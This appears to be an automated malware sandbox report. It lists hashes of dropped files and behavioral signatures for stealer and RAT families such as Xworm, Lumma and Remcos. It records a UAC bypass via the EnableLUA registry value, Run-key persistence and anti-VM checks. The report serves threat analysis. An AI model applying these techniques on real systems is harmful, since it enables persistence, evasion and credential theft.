C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
| MD5 | 7229bce5ce94ad8c3efdac6116ca0dfd |
| SHA1 | bab536edb7b176deedc34f51bca00786358a9238 |
| SHA256 | 786cacdf01a6f995fa366ec96f869e36aea02b478426595de4d72ce297b92312 |
| SHA512 | 147165e60b94781f32180d41107d81504cf6c8a08a7b235c0680af1708447341ab6cb42e4d8ba310b4425d30bb4961f91da1801f45285f32974ccd9f5a419f4b |
C:\Users\Admin\AppData\Local\Temp\a\Itaxyhi.exe
| MD5 | 78c586522f986994aa77c466c9d678a8 |
| SHA1 | 4b9b13c3782ae532a140a33ba673dc65a37aa882 |
| SHA256 | 498ac6b747691eb456fc24ac26c3932effca9b46e39740963120f711e72aefc9 |
| SHA512 | 707ff5fcbb5e473583bec2d54aac25a3febe262c06025c9d88ddd5d30449b1454289eaa63bec848ca69147232474731052bef710e60c042d0c80e9c02486b5bb |
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
| MD5 | 015a5ef479c8d3e296e6a99e0fa7df6a |
| SHA1 | 69f188973fdc12d282e490041d18b01c0d49752d |
| SHA256 | c73ff8630476795ba4dde19e7763d1aae50978b0b9b029cd71828a2da3c2197c |
| SHA512 | 4c692aaff1607cf402ed7acc2f91f587229bfface6f75ae8329e031d69437f43291b186e9ca4bcdea595145ea50f3e23d064306e9a8d83a8848cf9096146e46a |
C:\Users\Admin\AppData\Local\Temp\tmpB31F.tmp.dat
| MD5 | 49693267e0adbcd119f9f5e02adf3a80 |
| SHA1 | 3ba3d7f89b8ad195ca82c92737e960e1f2b349df |
| SHA256 | d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f |
| SHA512 | b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2 |
C:\Users\Admin\AppData\Local\Temp\1014474001\eccbe79ce7.exe
| MD5 | 28e568616a7b792cac1726deb77d9039 |
| SHA1 | 39890a418fb391b823ed5084533e2e24dff021e1 |
| SHA256 | 9597798f7789adc29fbe97707b1bd8ca913c4d5861b0ad4fdd6b913af7c7a8e2 |
| SHA512 | 85048799e6d2756f1d6af77f34e6a1f454c48f2f43042927845931b7ecff2e5de45f864627a3d4aa061252401225bbb6c2caa8532320ccbe401e97c9c79ac8e5 |
C:\Users\Admin\AppData\Local\Temp\1014478001\1a1deaa0c6.exe
| MD5 | dfd5f78a711fa92337010ecc028470b4 |
| SHA1 | 1a389091178f2be8ce486cd860de16263f8e902e |
| SHA256 | da96f2eb74e60de791961ef3800c36a5e12202fe97ae5d2fcfc1fe404bc13c0d |
| SHA512 | a3673074919039a2dc854b0f91d1e1a69724056594e33559741f53594e0f6e61e3d99ec664d541b17f09ffdebc2de1b042eec19ca8477fac86359c703f8c9656 |
C:\Users\Admin\AppData\Local\Temp\1014479001\31e8fbfe83.exe
| MD5 | 659b475361502e4bb93cb3978d0d69c6 |
| SHA1 | 9b4db8cab515e22350a6de83e9b892e9376fd391 |
| SHA256 | 9cd587e74a90f572286c6606c8d0dd40c5053aab867b5347c2499e5338a46b2d |
| SHA512 | 6b31ca314b6c4268703197bdcc093fde7cfa50d2ea8461a9fe83ee7da1d2ea0bfedf13dab4c4cfecddd1bb172990cd19f1d0714324c58ec0d3a61f8ad8f1491f |
C:\Users\Admin\AppData\Local\Temp\1014480001\d4577f4647.exe
| MD5 | 5d9844d41deb6ff87da1a76c5d5e5cee |
| SHA1 | 3319af613a4f9567923f68ba28709e64c3ad7a51 |
| SHA256 | 64de006489ffcdaf98a732d0b31f0c941254fe356f933e78abc812ea39c85d0e |
| SHA512 | 1090c7f408a978f4d6d96eca5ec9227ebd4e2954fb822b86ba161405ac4f07748075da920afe56c255b4aedaca542a4d4dce14ffec6c1f2f363b7aa3146727d9 |
C:\Users\Admin\AppData\Local\Temp\1014481001\5b90a0f71d.exe
| MD5 | c92e60d1cb34de101ddafcfef4e3a1c4 |
| SHA1 | 1cc375954dac4ad8f008c831bc52c9bdf4460261 |
| SHA256 | 68fefaa70bd63ff3251ce5e536b278e23b29141bb491a43fc4a85de7fe74dfce |
| SHA512 | 583f4b31f42ba638267e6f870cd95f4aa3c5b1168d19cf69bc182422970866e7b81bfaf878a3acc43c3021f64279a4a265f195511c31130993f465b59d732a65 |
C:\Users\Admin\AppData\Local\Temp\1014482001\42ff40c8fe.exe
| MD5 | a52f89de445d348c1dc6a446f9a6eea8 |
| SHA1 | 532ec372f2f8ceb48920da1d2adc4414ecf64dd5 |
| SHA256 | 0b31681869289810076038b9cb447bc027373148e0c48a5e28ded81c484a7a2d |
| SHA512 | 0a80bbc7511a756440790bae7e2c168ff0497a406eca9c99702c18c22ba74502e7e78f5db74543d9378a436baee729908a295096dbcd4f85827f29fcbc995855 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\TTJXD3SW\download[1].htm
| MD5 | cfcd208495d565ef66e7dff9f98764da |
| SHA1 | b6589fc6ab0dc82cf12099d1c2d40ab994e8410c |
| SHA256 | 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9 |
| SHA512 | 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99 |
C:\Users\Admin\AppData\Local\Temp\main\KillDuplicate.cmd
| MD5 | 68cecdf24aa2fd011ece466f00ef8450 |
| SHA1 | 2f859046187e0d5286d0566fac590b1836f6e1b7 |
| SHA256 | 64929489dc8a0d66ea95113d4e676368edb576ea85d23564d53346b21c202770 |
| SHA512 | 471305140cf67abaec6927058853ef43c97bdca763398263fb7932550d72d69b2a9668b286df80b6b28e9dd1cba1c44aaa436931f42cc57766eff280fdb5477c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\datareporting\glean\pending_pings\0fc37bc9-bb82-4ad2-b890-114f5bcc9705
| MD5 | f34a059cc22794e8d317a26dc17fe1e6 |
| SHA1 | eb3b5f8f5391512b7c6caaa73c997f1961cd303b |
| SHA256 | 9d2e80f45d90992301f0c4a5553864868bf9519146367b18529f6531021427cd |
| SHA512 | 73e99ad52275f41aee74628ffb26a757f2748ba71f1a73f3fad3e755010ccb6b17e77a3f8b94bbf73871eb34779980f46ec0a2a05df1b91da1b726f9ea8e633c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\datareporting\glean\pending_pings\e7ab0f4f-5bc8-464e-8446-fd0f6f986a74
| MD5 | 1a09adfd4381e38ba8a7c846ff6956c2 |
| SHA1 | f31d123747d16614273e064d868ef904176bb167 |
| SHA256 | 52247719db4bdb1267f957955cd124483f942033cd80a5d488db15cdacfe18b5 |
| SHA512 | 3ae61f5ef3cb095ef5460705fe68a0bcb23d148ef9771e8a65aa06ca25a28cf273ab5ed0bdfd350be8a0ad18ca284adb008807d7fe358bfcdc511af8387b94aa |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\datareporting\glean\pending_pings\44e832a0-4744-48bc-b625-cd35db4d8d96
| MD5 | 4e849198a08f6ecf20c8c0cd0e8b729f |
| SHA1 | 3297917bd61fb976f20a0da454f0e7bb18451e5f |
| SHA256 | fd2de5e5cc91da6d7c5e630b5b2c135dcf4226b03186f05abf508792ee7d01da |
| SHA512 | 87184d38ce9775a13f7e0b40e8681bce55da23d74b916c377a6473ed76cbb45275394eee9654fae71f7ffde9693b7522390aba9eb4ceb73d5857faee9d85d61b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 611cdcd3a90986a37bd2b8f14ca4d0b9 |
| SHA1 | 964935cacd22bad41e54ced2c3b935a5e15bf3ec |
| SHA256 | baaa3868fda800f1e78b95354d7982b588ecd1e33faacd7c299f03b2a49d9c58 |
| SHA512 | a28d7dd94b8cac6042ee65cccbffb50cbc938c5ffaf08a76083288c741bd7209c7d2537c227b5b08238d4c7d3902e7b3c8009da762909e5b8640f07f3f79b4c1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\AlternateServices.bin
| MD5 | ec075cd9e3e6d6fbbdca0353928cbe7d |
| SHA1 | 88037820eb00a97ce95e030041f0ca862a4930f5 |
| SHA256 | 4d11608f21f9c543d9c517fb42240e4a4fb83339cd53475bf87704c7e8096734 |
| SHA512 | 5c3d3a062afa5f700f30a6075f0f31b11aff649b8fc3d2af6edf02cf215db7d266b9d207facf59569388e907f8277196425c4699436aa6def6ba998b8eef6ea8 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\AlternateServices.bin
| MD5 | e7848b13fdbc40b7c79e51251c079869 |
| SHA1 | cbd476e88616936566fa5604f9e3d1f16e8b3483 |
| SHA256 | eb06c5d74eb573d9a7d774093026b9944b1ef9d76cee1bc05b7d434cda3ec824 |
| SHA512 | 3fed6cd30d6aee649929f2360ee93c250b9fbdbf55243f363aa103cf05388cb126256b9789e9bcf747ff2d2dc7cc175bdb1fa4b8d2b7c7502dbe0884ba310d4f |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\prefs.js
| MD5 | 1d51deebf6935dd0127b8ed0a11bc1be |
| SHA1 | 59709b2367a93075e01fb709a3d9a23f6447c7d2 |
| SHA256 | 5a986e620bb60cf037f044e2a522ae9752333dff74fddfa825cfd7444f2515cb |
| SHA512 | 7fe0e0da8ce0771f2c818dc145b49c89cbbc1ba985965e357c9c4e7c6b631b2cf84d622f38d5ae9f7226ba3fd6377cad0c91637528dcb2ac19a8feaadb27d80c |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\yuzka873.default-release\activity-stream.discovery_stream.json
| MD5 | 45cdacf9c975ecb5de4bc6fe0a5af4b2 |
| SHA1 | f8af46d6cf98fa76ee1b1082757eaf1ea231a800 |
| SHA256 | b1d47103964989497147c36fbdd6845aee186e5b19e3e100462dcc41fe7acb44 |
| SHA512 | 7e27d58d356e5a9189eb42a9820a78026a74ca80f4c90d72575acbc0b408865876c8d5e6350688513baa72d467954dd19d936195e03997eadbbc7019c82bb75a |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\yuzka873.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
| MD5 | 96c542dec016d9ec1ecc4dddfcbaac66 |
| SHA1 | 6199f7648bb744efa58acf7b96fee85d938389e4 |
| SHA256 | 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798 |
| SHA512 | cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.chk
| MD5 | b4f1f3f2a52301d89cce9feae3e29d40 |
| SHA1 | 45ba1bdb9be41c9d9c356cf87d3d6cf14de31cf9 |
| SHA256 | 6990dd7db91d6dd1a99668123ef9ec65cdaca91aad26bea138c5aaa4dc1d1df2 |
| SHA512 | 851fc97baec00446155ccdd22166cebba97e8fbfd57408541925ab1add0e2bc3120891157609ee3ba82ed909246e5ef7d50ce055ba4271a96921d9543280d722 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\prefs-1.js
| MD5 | da2336fc386ff31b190089c05b95e4b5 |
| SHA1 | 807e4a7ea43b87a5fdc0b45b9ea296d6dbdf067a |
| SHA256 | 6add99ab4312d360a47f21f6e446a77c460b79f16d0ccc443a4319345d238cb9 |
| SHA512 | 74e0a4e29fa36a38904366a10fd37f5df159375eb899a5ff2f8868587cd550d20ea3d77b324120d0d5b06205b33e3885a44d876a02811afd6080172861ebd992 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 57729d53a98ca327538b51b1e3784bd1 |
| SHA1 | d54100e65920c5c0509d93fb27bcdd5a523fc273 |
| SHA256 | e684f0c5d14749c96380d22cfb23c605db01c1cfe3b4ec2bafbb1542dde545e0 |
| SHA512 | 195bf6d236672acbfebbc012895d8666c79b70642c82ba41de5cb7baa6b1494d07a7b684c447a84dac07b527e69b13216041fe08dd439b849e7a17da47ee3579 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | 09372174e83dbbf696ee732fd2e875bb |
| SHA1 | ba360186ba650a769f9303f48b7200fb5eaccee1 |
| SHA256 | c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f |
| SHA512 | b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | 823b768a4b7c6ae1b0b9d57f89bf92cc |
| SHA1 | 1a423c50aec2f66461b78f34a8e7a5de2e319362 |
| SHA256 | 62aeab8d5187bb9f4a729b1529a2905ee295440966d0cce5a229975d5913a166 |
| SHA512 | 805f2fb8e7a97e0dde3c7cefa75da6bbf9d1273a9b8b6b7203b152da766ec6b842fd5448cfaaba2d89c2b72a0b5c0b8e96c1864f5048dd5ec31b42b21ec884c5 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
| MD5 | 2a461e9eb87fd1955cea740a3444ee7a |
| SHA1 | b10755914c713f5a4677494dbe8a686ed458c3c5 |
| SHA256 | 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc |
| SHA512 | 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll.tmp
| MD5 | 842039753bf41fa5e11b3a1383061a87 |
| SHA1 | 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153 |
| SHA256 | d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c |
| SHA512 | d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\yuzka873.default-release\cache2\entries\92F4D5A4F9CED6E2E644D803AEE3647A0EA4D984
| MD5 | ccf76875444042d1c3b4cd4849888a69 |
| SHA1 | 199d8a7643e60805386839620ca7d98d7d3704f9 |
| SHA256 | f58a37bc2e8d3e4ebd89187b2d2384d0ccf9b320a5b9c5114f31bd48cc6798c3 |
| SHA512 | ff05773c3aefe820fe8a2c5ba9ac653f4a84274d6b69e0f599598430d5ed239106201da88a07bac812e850b1c0d91d512706b2114259f03692aefc5a4a05c662 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\AlternateServices.bin
| MD5 | ae217b6eb1a47e60555a1080be60bf99 |
| SHA1 | 34cbc6bacbe3ceec907574b0193633261e099c92 |
| SHA256 | 665c1dbb9c0564ffa4b1af97bd1406bf3bbe00d7b89d1957deec4cdcfc44ed48 |
| SHA512 | 02f6d70f4be993ed74bf4a8cef38c01032ea4fc97e9dbf9d6ca6fe323e15b15ed9b74da84e0674ed29800178270508a714cc9d32f4b7f0f6059861c5ee5c9d22 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\prefs.js
| MD5 | d07f18e94e21cacecf4769ac23bb52c5 |
| SHA1 | d22637753d7553312ba4f9984cc04891574dfd71 |
| SHA256 | 7fb13a8121c6e4b2f531b2ff6f1b569ccc6f494fde36b282a63d6c5f8d41f3d0 |
| SHA512 | f2b8fa81b1704515443c0f8d2ceba8d25b3f0b78f541a5bc22cc1c8551c294b3b1c109beee687f7771efee510a5e298c46874e45884e0752018a9570b4963f0e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\prefs-1.js
| MD5 | b032e975b33e771e7aeb5482147ff9a4 |
| SHA1 | 27d859ba1659eee731661b90df76e642eacf6209 |
| SHA256 | 9c85859deb4c3610478401ec6451580ce28983c771a4f7b92674d41f10bbb4b7 |
| SHA512 | ffc7138de0885736c5726dbdc2ee37b35fb9cc103a0975326533ba32611d569f81fc76f5df0c9b2f3eed43ecdd951fc7dbda0d0461ef6dc090d3a4bb98d00876 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal
| MD5 | afb72fae6b9c9d558545ac1e0c157da1 |
| SHA1 | f767d7a0741d255941b245eb1ba25963363d53e9 |
| SHA256 | 9a1bb9a23089972e76d8df1c66ad587bac865f8469316ff71b4037ce4576a124 |
| SHA512 | 184971bf4b2b8a9bc59b1645fe00c29d13195c8d52358c9842b52170300a33f1eb60a900c56315df679f6b8713b1bf3eb58f9f27b03e45657bfb0c1401d09436 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | 35e4127341c2102f0f267523f6e98c67 |
| SHA1 | b7b0a65c0e0c2b5f975323c80338e3cc661d29e8 |
| SHA256 | d883287e6c6a4c6e2d735cd27890dd3ddf40c69756a9898cd85ec5ffa09ad0b7 |
| SHA512 | fe55529ad0102b9485d9e517b499d86ba52dede9dfae51fe55e000afc937feec8d1d82805889bb6897d70812029854b2b85ac3d0dea6d46e87b035a025aa3de7 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
| MD5 | bf957ad58b55f64219ab3f793e374316 |
| SHA1 | a11adc9d7f2c28e04d9b35e23b7616d0527118a1 |
| SHA256 | bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda |
| SHA512 | 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
| MD5 | daf7ef3acccab478aaa7d6dc1c60f865 |
| SHA1 | f8246162b97ce4a945feced27b6ea114366ff2ad |
| SHA256 | bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e |
| SHA512 | 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon-2
| MD5 | 0a8747a2ac9ac08ae9508f36c6d75692 |
| SHA1 | b287a96fd6cc12433adb42193dfe06111c38eaf0 |
| SHA256 | 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03 |
| SHA512 | 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\gmp-widevinecdm\4.10.2710.0\LICENSE.txt.tmp
| MD5 | 49ddb419d96dceb9069018535fb2e2fc |
| SHA1 | 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6 |
| SHA256 | 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539 |
| SHA512 | 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-12-12 18:02
Reported
2024-12-12 18:07
Platform
win10v2004-20241007-en
Max time kernel
300s
Max time network
300s
Command Line
Signatures
44Caliber
44Caliber family
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Discord RAT
Discordrat family
Gurcu family
Gurcu, WhiteSnake
Lumma Stealer, LummaC
Lumma family
Stealc
Stealc family
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 6860 created 7044 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe |
| PID 6796 created 1516 | N/A | C:\Windows\system32\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a\boleto.exe |
| PID 3992 created 5172 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe |
| PID 5852 created 1764 | N/A | C:\Windows\system32\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe |
Suspicious use of NtCreateUserProcessOtherParentProcess
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Umbral
Umbral family
Xworm
Xworm family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Adds policy Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\qwex.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\random.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe | C:\Users\Admin\AppData\Local\Temp\onefile_3304_133785001843906793\l4.exe | N/A |
